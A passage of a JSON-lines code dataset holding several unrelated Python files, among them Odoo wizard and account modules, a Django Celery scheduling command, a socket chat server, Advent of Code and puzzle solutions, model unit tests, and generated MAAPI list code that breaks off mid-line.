self.pool.get('account.invoice')\n company_obj = self.pool.get('res.company')\n company_ids = company_obj.search(cr, uid, [('parent_id','=', False)])\n if company_ids and len(company_ids) == 1:\n customer_id = company_obj.browse(cr, uid, company_ids)[0].partner_id.id\n ids = self.search(cr, uid, []) \n if task_id:\n obj = task_obj.browse(cr, uid, task_id)\n \n invoice_ids = inoive_obj.search(cr, uid, [('company_id','=', obj.company_id.id), ('partner_id', '=', customer_id)], limit=1)\n mana_fee = 0\n if invoice_ids:\n mana_fee = inoive_obj.browse(cr, uid, invoice_ids)[0].amount_total\n \n task_ids = task_obj.search(cr, uid, [('company_id','=', obj.company_id.id),('state', 'not in', ('done', 'cancel'))])\n number_task = len(task_ids)\n if number_task == 0:\n result = 0\n return {'value': {'tasks_ahead': 0}}\n \n now = datetime.now() \n duration = now - datetime.strptime(obj.create_date, '%Y-%m-%d %H:%M:%S')\n days, seconds = duration.days, duration.seconds\n hours = days * 24 + seconds // 3600\n result = (mana_fee + amount) / number_task * int(hours)\n sql = ''' select id from project_task where state not in ('done', 'cancel') and sort_task_value > %s ''' %result\n cr.execute(sql)\n task_ids = cr.fetchall() \n return {'value': {'tasks_ahead': len(task_ids), 'task_value': result}} \n return {'value': {'tasks_ahead': 0}}\n \n def action_validate(self, cr, uid, ids, context={}):\n \n task_obj = self.pool.get('project.task')\n task_id = context.get('active_id', False)\n if not task_id:\n return {}\n for obj in self.browse(cr, uid, ids):\n task_obj.write(cr, uid, [task_id], {'amount' : obj.amount + task_obj.browse(cr, uid, task_id).amount,\n 'task_value' : obj.task_value,\n 'tasks_ahead': obj.tasks_ahead})\n\n return {'type': 'ir.actions.act_window_close'}\n \n\n","repo_name":"Minh-Tran/Codes","sub_path":"init_barry_code/wizard/init_update_task_squence.py","file_name":"init_update_task_squence.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10772782006","text":"from django.core.management import BaseCommand, CommandError\nfrom django_celery_beat.models import IntervalSchedule, PeriodicTask\n\n\nclass Command(BaseCommand):\n\n help = \"Set Periodic Task\"\n\n def handle(self, *args, **options):\n try:\n every_50_seconds, _ = IntervalSchedule.objects.get_or_create(every=50, period=IntervalSchedule.SECONDS,)\n every_24_hours, _ = IntervalSchedule.objects.get_or_create(every=24, period=IntervalSchedule.HOURS,)\n\n PeriodicTask.objects.update_or_create(\n task=\"api.tasks.get_youtube_videos\",\n name=\"Get Youtube Videos\",\n defaults=dict(\n interval=every_50_seconds,\n ),\n )\n\n PeriodicTask.objects.update_or_create(\n task=\"api.tasks.enable_api_keys\",\n name=\"Enable API KEYS\",\n defaults=dict(\n interval=every_24_hours,\n ),\n )\n except Exception as e:\n raise CommandError(e)\n","repo_name":"InvincibleDev/FamPay-Youtube-API","sub_path":"FamPayYoutube/api/management/commands/setperiodictask.py","file_name":"setperiodictask.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32636087971","text":"\"\"\"\nclient server communication, server side code review\n\"\"\"\nimport socket\nimport sys\nimport json\nimport argparse\nimport logging\nimport select\nimport time\nimport logs.config_log_server_side\nfrom shared.variables import DEFAULT_PORT, MAX_CONNECTIONS, ACTION, TIME, USER, \\\n ACCOUNT_NAME, SENDER, PRESENCE, RESPONSE, ERROR, MESSAGE, MESSAGE_TEXT\nfrom shared.utilities import get_message, send_message\nfrom shared.errors import UnreadableReceivedDataError\nfrom shared.decorators import log\n\nSERVER_SIDE_LOGGER = logging.getLogger('server_side_logger')\n\n\n@log\ndef analyzer(client_message, message_list, client):\n \"\"\"\n A message handler from clients that accepts a dictionary -\n    message from the client, checks the correctness, returns a\n response dictionary for a client\n \"\"\"\n SERVER_SIDE_LOGGER.debug(f'analyze of client message {client_message}')\n if ACTION in client_message and client_message[ACTION] == PRESENCE \\\n and TIME in client_message and USER in client_message \\\n and client_message[USER][ACCOUNT_NAME] == 'Anonymous':\n send_message(client, {RESPONSE: 200})\n return\n elif ACTION in client_message and client_message[ACTION] == MESSAGE and \\\n TIME in client_message and MESSAGE_TEXT in client_message:\n message_list.append((client_message[ACCOUNT_NAME], client_message[MESSAGE_TEXT]))\n return\n else:\n send_message(client, {\n RESPONSE: 400,\n ERROR: 'Bad Request'\n })\n return\n\n\n@log\ndef argument_parser():\n \"\"\"\n parsing arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', default=DEFAULT_PORT, type=int, nargs='?')\n parser.add_argument('-a', default='', nargs='?')\n namespace = parser.parse_args(sys.argv[1:])\n addr_to_listen = namespace.a\n port_to_listen = namespace.p\n\n if not 1023 < port_to_listen < 65536:\n SERVER_SIDE_LOGGER.critical(\n f'attempt to launch server with wrong port '\n f'{port_to_listen}, allowed ports from 1024 to 65535.'\n )\n sys.exit(1)\n\n return addr_to_listen, port_to_listen\n\n\ndef server_launcher():\n \"\"\"\n loading params of cmd, if they're not set,\n will defined by default, after that function detects\n addr which will be listen, prepares port and\n starts to receive a information\n \"\"\"\n addr_to_listen, port_to_listen = argument_parser()\n\n SERVER_SIDE_LOGGER.info(\n f'server launched, port to connect: {port_to_listen} '\n f'connection from address: {addr_to_listen} '\n f'(If address not defined, connection will be available without it)'\n )\n\n transfer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n transfer.bind((addr_to_listen, port_to_listen))\n transfer.settimeout(0.5)\n clients_online = []\n messages_queue = []\n transfer.listen(MAX_CONNECTIONS)\n\n while True:\n try:\n client_socket_box, addr_to_listen = transfer.accept()\n except OSError:\n pass\n else:\n SERVER_SIDE_LOGGER.info(f'connection with PC {addr_to_listen} stabilized')\n clients_online.append(client_socket_box)\n\n data_list_for_receiving = []\n data_list_to_send = []\n data_list_of_err_occured = []\n\n try:\n if clients_online:\n data_list_for_receiving, data_list_to_send, data_list_of_err_occured = \\\n select.select(clients_online, clients_online, [], 0)\n except OSError:\n pass\n if data_list_for_receiving:\n for msg_by_client in data_list_for_receiving:\n try:\n analyzer(get_message(msg_by_client),\n messages_queue, msg_by_client)\n except:\n SERVER_SIDE_LOGGER.info(f'client {msg_by_client.getpeername()} '\n f'disconnected from server')\n clients_online.remove(msg_by_client)\n if messages_queue and data_list_to_send:\n message = {\n ACTION: MESSAGE,\n SENDER: messages_queue[0][0],\n TIME: time.time(),\n MESSAGE_TEXT: messages_queue[0][1]\n }\n del messages_queue[0]\n for client_from_queue in data_list_to_send:\n try:\n send_message(client_from_queue, message)\n except:\n SERVER_SIDE_LOGGER.info(f' client {client_from_queue.getpeername()} '\n f'disconnected from server')\n clients_online.remove(client_from_queue)\n\n\nif __name__ == '__main__':\n server_launcher()\n","repo_name":"machukhinktato/Python-client-server-applications","sub_path":"lesson_8/server_side.py","file_name":"server_side.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1933232371","text":"with open(\"C:/dev/adventofcode/7.txt\") as file:\r\n cmds = file.read().splitlines()\r\n\r\nwith open('C:/dev/adventofcode/7_test.txt') as testfile:\r\n testcmds = testfile.read().splitlines()\r\n\r\ndir_tree = {}\r\n\r\n\r\ndef get_parent_dir(value, dirs):\r\n # value is current_dir\r\n # dirs is dir_tree\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n if value in dirs[entry].values():\r\n if dirs[entry]:\r\n return dirs[entry]\r\n else:\r\n return dir_tree['/']\r\n else:\r\n if get_parent_dir(value, dirs[entry]):\r\n return get_parent_dir(value, dirs[entry])\r\n\r\n\r\ndef count_directory_sizes(dirs):\r\n # start from dir_tree['/']\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n dirs['size'] += dirs[entry]['size']\r\n count_directory_sizes(dirs[entry])\r\n\r\n\r\ndef count_max100kdirs_size(dirs):\r\n maxdirsize = 0\r\n for entry in dirs:\r\n if isinstance(dirs[entry], dict):\r\n if dirs[entry]['size'] <= 100000:\r\n maxdirsize += dirs[entry]['size']\r\n maxdirsize += count_max100kdirs_size(dirs[entry])\r\n return maxdirsize\r\n\r\n\r\nfor cmd in cmds:\r\n\r\n cmd = cmd.split(' ')\r\n\r\n if cmd[0] == '$':\r\n if cmd[1] == 'cd':\r\n if cmd[2] == '/':\r\n dir_tree['/'] = {\r\n 'size': 0,\r\n }\r\n current_dir = dir_tree['/']\r\n elif cmd[2] == '..':\r\n current_dir = get_parent_dir(current_dir, dir_tree)\r\n else:\r\n current_dir = current_dir['dir %s' % cmd[2]]\r\n elif cmd[1] == 'ls':\r\n pass\r\n elif cmd[0] == 'dir':\r\n current_dir['dir %s' % cmd[1]] = {\r\n 'size': 0,\r\n }\r\n elif cmd[0].isnumeric():\r\n current_dir[cmd[1]] = int(cmd[0])\r\n current_dir['size'] += int(cmd[0])\r\n\r\ncount_directory_sizes(dir_tree['/'])\r\nprint(count_max100kdirs_size(dir_tree))\r\n","repo_name":"krisztiantalan/adventofcode","sub_path":"adventofcode/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27472514608","text":"def verificação(string):\n string.lower()\n while True:\n lele = input(\"Digite uma opção: \").lower()\n for c in lele:\n if c in string:\n return True\n else:\n print(\"Tente novamente\")\n break\nprint(verificação(\"abcsdfagtewtasfasr\"))","repo_name":"batmit/Introducao-a-Python","sub_path":"#def/#15.py","file_name":"#15.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25332479636","text":"#!/usr/bin/python3\n\n\"\"\"Unit tests for review.py.\"\"\"\n\nimport unittest\nfrom models.review import Review\nfrom models.base_model import BaseModel\nimport models\n\n\nclass TestReview(unittest.TestCase):\n \"\"\"Unit tests for the Review class.\"\"\"\n\n def test_review_inherits_from_base_model(self):\n \"\"\"Test if Review inherits from BaseModel.\"\"\"\n self.assertTrue(issubclass(Review, BaseModel))\n\n def test_review_attributes(self):\n \"\"\"Test the attributes of the Review class.\"\"\"\n review = Review()\n self.assertTrue(hasattr(review, \"place_id\"))\n self.assertTrue(hasattr(review, \"user_id\"))\n self.assertTrue(hasattr(review, \"text\"))\n\n def test_review_attribute_types(self):\n \"\"\"Test the attribute types of the Review class.\"\"\"\n review = Review()\n self.assertIsInstance(review.place_id, str)\n self.assertIsInstance(review.user_id, str)\n self.assertIsInstance(review.text, str)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"abdel-moaty/AirBnB_clone","sub_path":"tests/test_models/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393056872","text":"def add_count(ban, key):\n if key in ban:\n ban[key] += 1\n else:\n ban[key] = 1\n\n\ndef report_process(id_list, report):\n result = dict()\n ban_list = dict()\n\n for s in report:\n user, ban_id = s.split()\n if user in result:\n if ban_id in result[user]: continue\n result[user].add(ban_id)\n add_count(ban_list, ban_id)\n else:\n result[user] = set([ban_id])\n add_count(ban_list, ban_id)\n\n return result, ban_list\n\n\ndef solution(id_list, report, k):\n answer = []\n\n result, ban_list = report_process(id_list, report)\n for user in id_list:\n cnt = 0\n for ban_id in result[user]:\n if ban_id in ban_list and ban_list[ban_id] >= k:\n cnt += 1\n answer.append(cnt)\n return answer\n\n\n\nprint(solution([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"], 2))\n#\n# from collections import defaultdict\n#\n#\n# def solution(id_list, report, k):\n# dt = defaultdict(int)\n# reported = defaultdict(set)\n#\n# for ele in report:\n# a, b = ele.split()\n# reported[b].add(a)\n#\n# for key in reported:\n# if len(reported[key]) >= k:\n# for ele in reported[key]:\n# dt[ele] += 1\n#\n# return [dt[x] for x in id_list]","repo_name":"112224/algorithm","sub_path":"python3/P_신고 결과 받기.py","file_name":"P_신고 결과 받기.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72018049192","text":"from odoo import api, fields, models, _\nimport odoo.addons.decimal_precision as dp\n\nclass AccountAccount(models.Model):\n _inherit = \"account.account\"\n \n\n# mapping = {\n# 'balance': \"COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) as balance\",\n# 'debit': \"COALESCE(SUM(l.debit), 0) as debit\",\n# 'credit': \"COALESCE(SUM(l.credit), 0) as credit\",\n# }\n \n @api.one\n def compute_values(self):\n for account in self:\n balance = 0.0\n credit = 0.0\n debit = 0.0\n search_domain = [('account_id','in',[self.id])]\n for val in self.env['account.move.line'].search(search_domain):\n if val.move_id.state == 'posted':\n balance += val.debit - val.credit\n credit += val.credit\n debit += val.debit\n account.balance = balance\n account.credit = credit\n account.debit = debit\n \n balance = fields.Float(compute=\"compute_values\", digits=dp.get_precision('Account'), string='Saldo')\n credit = fields.Float(compute=\"compute_values\",digits=dp.get_precision('Account'), string='Credito')\n debit = fields.Float(compute=\"compute_values\",digits=dp.get_precision('Account'), string='Debito')\n","repo_name":"falconsoft3d/chart_account_balance","sub_path":"chart_account_balance/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3633710307","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\nfrom a.infra.misc.init_guard import InitGuard\n\nfrom a.sys.confd.pyconfdlib.tag_values import TagValues\nfrom a.sys.confd.pyconfdlib.value import Value\nfrom a.sys.confd.pyconfdlib.key_path import KeyPath\n\nfrom test_generation_underscore_maapi_list_base_gen import TestGenerationUnderscoreMaapiListBase\nfrom test_generation_underscore_maapi_gen import BlinkyTestGenerationUnderscoreMaapi\n\nclass BlinkyTestGenerationUnderscoreMaapiList(TestGenerationUnderscoreMaapiListBase):\n def __init__ (self, logger):\n self.myInitGuard = InitGuard()\n self._log=logger.createLogger(\"sys-blinky-oper-example\",\"blinky-maapi-testGenerationUnderscore\")\n self.domain = None\n\n self.testGenerationUnderscores = {}\n self.testGenerationUnderscoreKeys = []\n\n def init (self, domain):\n self.myInitGuard.crashIfInitDone()\n for logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)\n self.domain = domain\n self.myInitGuard.initDone()\n\n def newTestGenerationUnderscore (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('new-testgenerationunderscore').debug3Func(): logFunc('called.')\n testGenerationUnderscore = BlinkyTestGenerationUnderscoreMaapi(self._log)\n testGenerationUnderscore.init(self.domain)\n return testGenerationUnderscore\n\n def setTestGenerationUnderscoreObj (self, key, testGenerationUnderscoreObj):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('set-testgenerationunderscore-obj').debug3Func(): logFunc('called. key=%s, testGenerationUnderscoreObj=%s', key, testGenerationUnderscoreObj)\n if key not in self.testGenerationUnderscores:\n self.testGenerationUnderscoreKeys.append(key)\n self.testGenerationUnderscores[str(key)] = testGenerationUnderscoreObj\n\n def getTestGenerationUnderscoreObj (self, key):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-testgenerationunderscore-obj').debug3Func(): logFunc('called. key=%s', key)\n if str(key) in self.testGenerationUnderscores.keys():\n for logFunc in self._log('get-testgenerationunderscore-obj-done').debug3Func(): logFunc('Done. found key=%s, obj=%s', key, self.testGenerationUnderscores[str(key)])\n return self.testGenerationUnderscores[str(key)]\n for logFunc in self._log('get-testgenerationunderscore-obj-missing').errorFunc(): logFunc('testGenerationUnderscore %s not in testGenerationUnderscores. existing items: %s', key, self.testGenerationUnderscores.keys())\n return None\n\n def deleteTestGenerationUnderscore (self, key):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('delete-testgenerationunderscore').debug3Func(): logFunc('called. key=%s', key)\n if str(key) not in self.testGenerationUnderscoreKeys:\n for logFunc in self._log('delete-testGenerationUnderscore-not-found').warningFunc(): logFunc('key=%s is missing from the testGenerationUnderscoreKeys list', key)\n if str(key) in self.testGenerationUnderscores.keys():\n # internal problem - list & dictionary are not synced\n for logFunc in self._log('delete-testgenerationunderscore-not-found-but-in-dict').errorFunc(): logFunc('testGenerationUnderscores dictionary & testGenerationUnderscoreKeys list are out-of-sync. key %s exists in dict but not in list', key)\n return ReturnCodes.kGeneralError\n if str(key) not in self.testGenerationUnderscores.keys():\n # internal problem - list & dictionary are not synced\n for logFunc in self._log('delete-testGenerationUnderscore-not-found-but-in-list').errorFunc(): logFunc('testGenerationUnderscores dictionary & testGenerationUnderscoreKeys list are out-of-sync. key %s exists in list but not in dict', key)\n return ReturnCodes.kGeneralError\n\n self.testGenerationUnderscoreKeys.remove(str(key))\n del self.testGenerationUnderscores[str(key)]\n\n def hasTestGenerationUnderscoreObj (self, key):\n self.myInitGuard.isInitOrCrash()\n has = False\n if str(key) in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[str(key)]:\n has = True\n for logFunc in self._log('has-testgenerationunderscore-done').debug3Func(): logFunc('done. key=%s exists=%s', key, has)\n return has\n\n def getListKeys (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-list-keys').debug3Func(): logFunc('called. keys=%s', [str(x) for x in self.testGenerationUnderscoreKeys])\n return self.testGenerationUnderscoreKeys\n\n def requestConfigAndOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestConfigAndOper()\n\n def requestConfig (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestConfig()\n\n def requestOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-oper').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.requestOper()\n\n def clearAllRequested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called.')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n testGenerationUnderscore.clearAllRequested()\n\n def _clearAllReadData (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')\n for testGenerationUnderscore in self.testGenerationUnderscores.values():\n if testGenerationUnderscore:\n testGenerationUnderscore._clearAllReadData()\n\n def clearAllSet (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n self.testGenerationUnderscores[key].clearAllSet()\n else:\n self.testGenerationUnderscoreKeys.remove(str(key))\n del self.testGenerationUnderscores[str(key)]\n\n def _getSelfKeyPath (self, lake\n , fish_\n \n , junkForTemplate):\n for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS. junkForTemplate=%s', junkForTemplate)\n keyPath = KeyPath()\n\n \n \n \n \n ancestorVal = Value()\n ancestorVal.setString(fish_);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"fish\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n \n ancestorVal = Value()\n ancestorVal.setString(lake);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"lake\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n\n for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. PARAMS', keyPath)\n return keyPath\n\n def readListKeys (self\n , lake\n , fish_\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-list-keys').debug3Func(): logFunc('called')\n\n # clear the old map\n self.testGenerationUnderscores = {}\n self.testGenerationUnderscoreKeys = []\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n xmlVal = Value()\n xmlVal.setXmlTag((\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPostfix(xmlVal)\n\n keys = []\n\n res = self.domain.readMaapiKeys(keyPath, keys, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-list-keys-domain-failed').errorFunc(): logFunc('domain.readMaapiKeys() failed')\n return ReturnCodes.kGeneralError\n\n for key in keys:\n self.testGenerationUnderscoreKeys.append(key.getCannonicalStr())\n self.testGenerationUnderscores[key.getCannonicalStr()] = None\n\n return ReturnCodes.kOk\n\n def write (self\n , lake\n , fish_\n , trxContext=None\n ):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')\n return self._internalWrite(lake, fish_, \n trxContext)\n\n def read (self\n , lake\n , fish_\n \n , trxContext=None):\n for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(lake, fish_, \n False,\n trxContext)\n\n def readAllOrFail (self\n , lake\n , fish_\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(lake, fish_, \n True,\n trxContext)\n\n def _internalWrite (self, \n lake, \n fish_, \n \n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-write').debug3Func(): logFunc('called.')\n\n tagValueList = TagValues()\n\n res = self._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed')\n return ReturnCodes.kGeneralError\n\n itemsToDelete = []\n res = self._collectItemsToDelete(lake, \n fish_, \n \n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')\n return ReturnCodes.kOk\n\n def _internalRead (self, \n lake, \n fish_, \n \n readAllOrFail,\n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-read').debug3Func(): logFunc('called. readAllOrFail=%s', readAllOrFail)\n\n if readAllOrFail:\n self._clearAllReadData()\n\n tagValueList = TagValues()\n\n res = self._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-fill-read-tag-values-failed').errorFunc(): logFunc('_fillReadTagValues() failed')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n\n res = self.domain.readMaapi(tagValueList, keyPath, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed.')\n return ReturnCodes.kGeneralError\n\n res = self._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('internal-read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed.')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. readAllOrFail=%s', readAllOrFail)\n return ReturnCodes.kOk\n\n def _collectItemsToDelete (self,\n lake, \n fish_, \n \n itemsToDelete):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n res = self.testGenerationUnderscores[key]._collectItemsToDelete(lake, \n fish_, \n \n key,\n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('collect-items-to-delete-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscoreObj._collectItemsToDelete() failed. key=%s. PARAMS', key)\n return ReturnCodes.kGeneralError\n\n else:\n keyPath = self._getSelfKeyPath(lake, \n fish_, \n \n None)\n xmlVal = Value()\n xmlVal.setXmlTag((\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\"))\n keyPath.addKeyPathPostfix(xmlVal)\n valKey = Value()\n valKey.setString(key)\n keyPath.addKeyPathPostfix(valKey)\n\n itemsToDelete.append(keyPath)\n\n for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)\n return ReturnCodes.kOk\n\n def _fillWriteTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n valBegin = Value()\n (tag, ns, prefix) = (\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\")\n valBegin.setXmlBegin((tag, ns, prefix))\n tagValueList.push((tag, ns), valBegin)\n\n valKey = Value()\n valKey.setString(key)\n tagValueList.push((\"name\", \"http://qwilt.com/model/lake-example\"), valKey)\n\n tagValueListLen = tagValueList.getLen()\n\n res = self.testGenerationUnderscores[key]._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('fill-write-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._fillWriteTagValues() failed. key=%s', key)\n return ReturnCodes.kGeneralError\n\n if tagValueList.getLen() == tagValueListLen:\n # descendant didn't add anything, no need to read it.\n tagValueList.pop()\n tagValueList.pop()\n else:\n valEnd = Value()\n valEnd.setXmlEnd((tag, ns, prefix))\n tagValueList.push((tag, ns), valEnd)\n\n return ReturnCodes.kOk\n\n def _fillReadTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n valBegin = Value()\n (tag, ns, prefix) = (\"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", \"lake-example\")\n valBegin.setXmlBegin((tag, ns, prefix))\n tagValueList.push((tag, ns), valBegin)\n\n valKey = Value()\n valKey.setString(key)\n tagValueList.push((\"name\", \"http://qwilt.com/model/lake-example\"), valKey)\n\n tagValueListLen = tagValueList.getLen()\n\n res = self.testGenerationUnderscores[key]._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('fill-read-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._fillReadTagValues() failed. key=%s', key)\n return ReturnCodes.kGeneralError\n\n if tagValueList.getLen() == tagValueListLen:\n # descendant didn't add anything, no need to read it.\n tagValueList.pop()\n tagValueList.pop()\n else:\n valEnd = Value()\n valEnd.setXmlEnd((tag, ns, prefix))\n tagValueList.push((tag, ns), valEnd)\n\n return ReturnCodes.kOk\n\n def _readTagValues (self, tagValueList, readAllOrFail):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. tagValueList=%s, readAllOrFail=%s', tagValueList, readAllOrFail)\n\n res = ReturnCodes.kOk\n\n for key in self.testGenerationUnderscores.keys():\n if self.testGenerationUnderscores[key]:\n ((tag, ns), valBegin) = tagValueList.popFront()\n if (tag != \"test-generation_underscore\") or \\\n (ns != \"http://qwilt.com/model/lake-example\") or \\\n (valBegin.getType() != Value.kXmlBegin):\n for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',\n \"test-generation_underscore\", \"http://qwilt.com/model/lake-example\", Value.kXmlBegin,\n tag, ns, valBegin.getType())\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n ((tag, ns), valKey) = tagValueList.popFront()\n if (tag != \"name\") or \\\n (ns != \"http://qwilt.com/model/lake-example\"):\n for logFunc in self._log('reag-tag-values-unexpected-tag-key').errorFunc(): logFunc('got unexpected tag-value for key. expected: (%s, %s), got: (%s, %s)',\n \"name\", \"http://qwilt.com/model/lake-example\", tag, ns)\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n key = valKey.asString()\n if res != ReturnCodes.kOk:\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n res = self.testGenerationUnderscores[key]._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-tag-values-testGenerationUnderscore-failed').errorFunc(): logFunc('testGenerationUnderscore._readTagValues() failed. key=%s', key)\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n ((tag, ns), valEnd) = tagValueList.popFront()\n if (tag != \"test-generation_underscore\") or \\\n (ns != \"http://qwilt.com/model/lake-example\") or \\\n (valEnd.getType() != Value.kXmlEnd):\n for logFunc in 